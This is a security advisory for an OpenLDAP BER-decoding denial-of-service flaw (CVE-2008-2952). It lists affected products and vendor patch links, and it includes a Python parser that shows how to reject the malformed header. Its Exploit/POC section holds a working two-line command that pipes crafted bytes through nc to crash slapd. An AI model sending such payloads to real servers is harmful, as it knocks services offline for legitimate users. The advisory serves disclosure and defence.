OpenLDAP BER Decoding Remote Denial of Service Vulnerability
BID:30013
Info
| Bugtraq ID: | 30013 |
| Class: | Design Error |
| CVE: | CVE-2008-2952 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 30 2008 12:00AM |
| Updated: | May 07 2015 05:08PM |
| Credit: | Cameron Hotchkies |
| Vulnerable: | Ubuntu Linux 8.04 LTS (sparc, powerpc, lpia, i386, amd64); Ubuntu Linux 7.10 (sparc, powerpc, lpia, i386, amd64); Ubuntu Linux 7.04 (sparc, powerpc, i386, amd64); Ubuntu Linux 6.06 LTS (sparc, powerpc, i386, amd64); Turbolinux Server 11, Turbolinux Server 11 x64, Turbolinux Server 10.0 x86, Turbolinux Server 10.0.0 x64; Turbolinux Appliance Server 3.0, 3.0 x64, 2.0; SUSE Linux Enterprise Server 8, 10 SP1, 10 SP2; SUSE Linux Enterprise SDK 10 SP1; SUSE Linux Enterprise Desktop 10 SP1, 10 SP2; SUSE Linux Enterprise 10 SP2 DEBUGINFO; openSUSE 10.2, 10.3, 11.0; Novell Open-Enterprise-Server; Novell Linux POS 9; Novell Linux Desktop 9.0; rPath Linux 2; rPath Appliance Platform Linux Service 2; Red Hat Enterprise Linux 4 (AS, ES, WS), Red Hat Desktop 4.0, Red Hat Enterprise Linux 5 Server, Red Hat Enterprise Linux Desktop 5 client, Red Hat Enterprise Linux Desktop Workstation 5 client; Pardus Linux 2007, 2008; OpenLDAP 2.1.4, 2.1.18, 2.1.19, 2.1.22, 2.1.25, 2.1.30, 2.2.6, 2.2.15, 2.2.26, 2.2.29, 2.3.6, 2.3.25, 2.3.27, 2.3.27-2.20061018, 2.3.28-20061022, 2.3.28-2.20061022, 2.3.28-E1.0.0, 2.3.39, 2.3.40, 2.3.41; Mandriva Linux 2007.1, 2007.1 x86_64, 2008.0, 2008.0 x86_64, 2008.1, 2008.1 x86_64; MandrakeSoft Multi Network Firewall 2.0; MandrakeSoft Corporate Server 3.0, 3.0 x86_64, 4.0, 4.0 x86_64; Gentoo Linux; Debian Linux 4.0 (alpha, amd64, arm, hppa, ia-32, ia-64, m68k, mips, mipsel, powerpc, s/390, sparc); Apple Mac OS X 10.4, 10.4.1 through 10.4.11, 10.5, 10.5.1 through 10.5.4; Apple Mac OS X Server 10.4, 10.4.1 through 10.4.11, 10.5, 10.5.1 through 10.5.4 |
| Not Vulnerable: | |
Discussion
OpenLDAP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to deny service to legitimate users by crashing affected servers.
OpenLDAP 2.3.41 is vulnerable to this issue; earlier versions back to approximately 2.1.18 as well as newer versions may also be affected.
Exploit / POC
Attackers use readily available network utilities to exploit this vulnerability. The following commands demonstrate this issue:
slapd -h ldap:// -d511 &
perl -e 'print "\xff\xff\xff\x00\x84\x41\x42\x43\x44"' | nc localhost 389
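The bytes in the PoC above are a BER tag/length header with nothing behind it: the leading 0xff octets select the high-tag-number form, 0x84 announces a four-octet long-form length, and 0x41424344 claims roughly 1 GiB of content. As an added example (not OpenLDAP's liblber code), the following bounds-checked header parser shows how a decoder can refuse such a header before buffering anything; MAX_TAG_BYTES, MAX_LEN_BYTES and MAX_MESSAGE are assumed policy values, and a real slapd caps incoming PDU size with the sockbuf_max_incoming directive.

```python
# Added example (not OpenLDAP's liblber code): bounds-checked BER tag/length header parser.
MAX_TAG_BYTES = 5      # assumed policy limit for high-tag-number octets
MAX_LEN_BYTES = 4      # assumed policy limit for long-form length octets
MAX_MESSAGE = 1 << 20  # assumed per-PDU size ceiling (1 MiB)
POC = b"\xff\xff\xff\x00\x84\x41\x42\x43\x44"  # bytes from the PoC above

class BerError(ValueError):
    pass

def parse_ber_header(buf: bytes):
    """Return (tag_number, content_length, header_size) or raise BerError."""
    if not buf:
        raise BerError("empty input")
    tag, i = buf[0] & 0x1F, 1
    if tag == 0x1F:  # high-tag-number form: 7 bits per octet, MSB set = more
        tag = 0
        for _ in range(MAX_TAG_BYTES):
            if i >= len(buf):
                raise BerError("truncated tag")
            b, i = buf[i], i + 1
            tag = (tag << 7) | (b & 0x7F)
            if not b & 0x80:
                break
        else:
            raise BerError("tag number too long")
    if i >= len(buf):
        raise BerError("missing length octet")
    l0, i = buf[i], i + 1
    if l0 == 0x80:
        raise BerError("indefinite length is not allowed in LDAP")
    if l0 & 0x80:  # long form: low 7 bits = number of length octets to follow
        n = l0 & 0x7F
        if n > MAX_LEN_BYTES:
            raise BerError("length field too wide")
        if i + n > len(buf):
            raise BerError("truncated length")
        length, i = int.from_bytes(buf[i:i + n], "big"), i + n
    else:
        length = l0
    # Reject before buffering: a claimed size the server would never accept.
    if length > MAX_MESSAGE:
        raise BerError(f"claimed length {length} exceeds limit")
    return tag, length, i

def check(buf: bytes) -> str:
    try:
        tag, length, hdr = parse_ber_header(buf)
        return f"ok tag={tag} len={length} hdr={hdr}"
    except BerError as e:
        return f"rejected: {e}"
```

Running `check(POC)` reports the header rejected for its claimed length of 1094861636 bytes, while a well-formed LDAP header such as `30 05 ...` decodes to tag 16 (SEQUENCE), length 5.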
Solution / Fix
Solution:
The vendor has released fixes. Please see the references for more information.
OpenLDAP 2.1.4, 2.1.18, 2.1.19, 2.1.22, 2.2.15, 2.2.26, 2.3.25, 2.3.27-2.20061018, 2.3.28-20061022, 2.3.28-2.20061022, 2.3.39, 2.3.41
- OpenLDAP io.c patch 1.121: http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r1=1.120&r2=1.121&hideattic=1&sortbydate=0
Debian Linux 4.0 amd64
- Debian ldap-utils_2.3.30-5+etch2_amd64.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch2_amd64.deb
- Debian libldap-2.3-0_2.3.30-5+etch2_amd64.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch2_amd64.deb
- Debian slapd_2.3.30-5+etch2_amd64.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch2_amd64.deb
Debian Linux 4.0 ia-32
- Debian ldap-utils_2.3.30-5+etch2_i386.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch2_i386.deb
- Debian libldap-2.3-0_2.3.30-5+etch2_i386.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch2_i386.deb
- Debian slapd_2.3.30-5+etch2_i386.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch2_i386.deb
Debian Linux 4.0 mips
- Debian ldap-utils_2.3.30-5+etch2_mips.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch2_mips.deb
- Debian libldap-2.3-0_2.3.30-5+etch2_mips.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch2_mips.deb
- Debian slapd_2.3.30-5+etch2_mips.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch2_mips.deb
Debian Linux 4.0 arm
- Debian ldap-utils_2.3.30-5+etch2_arm.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch2_arm.deb
- Debian libldap-2.3-0_2.3.30-5+etch2_arm.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch2_arm.deb
- Debian slapd_2.3.30-5+etch2_arm.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch2_arm.deb
Debian Linux 4.0 powerpc
- Debian ldap-utils_2.3.30-5+etch2_powerpc.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch2_powerpc.deb
- Debian libldap-2.3-0_2.3.30-5+etch2_powerpc.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch2_powerpc.deb
- Debian slapd_2.3.30-5+etch2_powerpc.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch2_powerpc.deb
Debian Linux 4.0 sparc
- Debian ldap-utils_2.3.30-5+etch2_sparc.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch2_sparc.deb
- Debian libldap-2.3-0_2.3.30-5+etch2_sparc.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch2_sparc.deb
- Debian slapd_2.3.30-5+etch2_sparc.deb: http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch2_sparc.deb
Apple Mac OS X 10.4.11
- Apple SecUpd2008-005Intel.dmg, for Mac OS X v10.4.11 (Intel): http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20387&cat=1&platform=osx&method=sa/SecUpd2008-005Intel.dmg
- Apple SecUpd2008-005PPC.dmg, for Mac OS X v10.4.11 (PPC): http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20386&cat=1&platform=osx&method=sa/SecUpd2008-005PPC.dmg
Apple Mac OS X Server 10.4.11
- Apple SecUpdSrvr2008-005PPC.dmg, for Mac OS X Server v10.4.11 (PPC): http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20384&cat=1&platform=osx&method=sa/SecUpdSrvr2008-005PPC.dmg
- Apple SecUpdSrvr2008-005Univ.dmg, for Mac OS X Server v10.4.11 (Universal): http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20385&cat=1&platform=osx&method=sa/SecUpdSrvr2008-005Univ.dmg
Apple Mac OS X 10.5.4
- Apple SecUpd2008-005.dmg, for Mac OS X v10.5.4 and Mac OS X Server 10.5.4: http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20388&cat=1&platform=osx&method=sa/SecUpd2008-005.dmg
OpenLDAP 2.3.6
References